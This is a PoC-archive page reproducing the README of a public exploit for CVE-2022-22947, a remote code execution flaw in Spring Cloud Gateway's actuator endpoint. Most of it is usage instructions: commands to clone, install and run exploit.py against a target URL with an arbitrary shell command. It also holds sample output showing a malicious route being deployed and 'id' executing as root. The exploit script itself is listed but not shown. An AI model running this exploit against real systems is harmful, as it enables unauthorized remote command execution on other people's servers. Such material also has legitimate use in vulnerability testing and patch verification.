关联漏洞
描述
Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)
介绍
# Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)
###### CVE: CVE-2022-22947
###### CVSS: 10.0 (Vmware - https://tanzu.vmware.com/security/cve-2022-22947)
###### Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.
#### Usage
```sh
git clone https://github.com/carlosevieira/CVE-2022-22947
cd CVE-2022-22947
pip3 install -r requirements.txt
python3 exploit.py http://target 'id'
```
```sh
john@doe:~/exploit/CVE-2022-22947/$ python3 exploit.py http://localhost:8080 'id'
###################################################
# #
# Exploit for CVE-2022-22947 #
# - Carlos Vieira (Crowsec) #
# #
# Usage: #
# python3 exploit.py <url> <command> #
# #
# Example: #
# python3 exploit.py http://localhost:8080 'id' #
# #
###################################################
[+] Stage deployed to /actuator/gateway/routes/rtxhovup
[+] Executing command...
[+] getting result...
[+] Stage removed!
uid=0(root) gid=0(root) groups=0(root)
```
#### References
https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/
https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published
https://tanzu.vmware.com/security/cve-2022-22947
文件快照
[4.0K] /data/pocs/5750bede1aa915efbee87c7bdeeea760a679f5fc
├── [3.1K] exploit.py
├── [1.8K] README.md
└── [ 89] requirements.txt
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。